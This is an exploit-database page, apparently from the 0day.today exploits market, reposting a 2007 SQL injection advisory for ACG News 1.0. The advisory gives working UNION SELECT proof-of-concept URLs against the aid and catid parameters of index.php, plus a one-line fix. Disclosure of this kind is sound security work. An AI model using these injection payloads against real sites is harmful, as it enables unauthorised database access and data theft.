[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ACG News 1.0 (aid/catid) Remote SQL Injection Vulnerabilities

Author
SmOk3
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2092
Category
web applications
Date add
27-08-2007
Platform
unsorted
=============================================================
ACG News 1.0 (aid/catid) Remote SQL Injection Vulnerabilities
=============================================================



ACG News SQL Injection

Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variables are $aid and $catid
on index.php file.

Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7

index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version


Solution:

Your script should filter metacharacters from user input.


Vendor contacted but I'm waiting for reply.



#  0day.today [2024-12-25]  #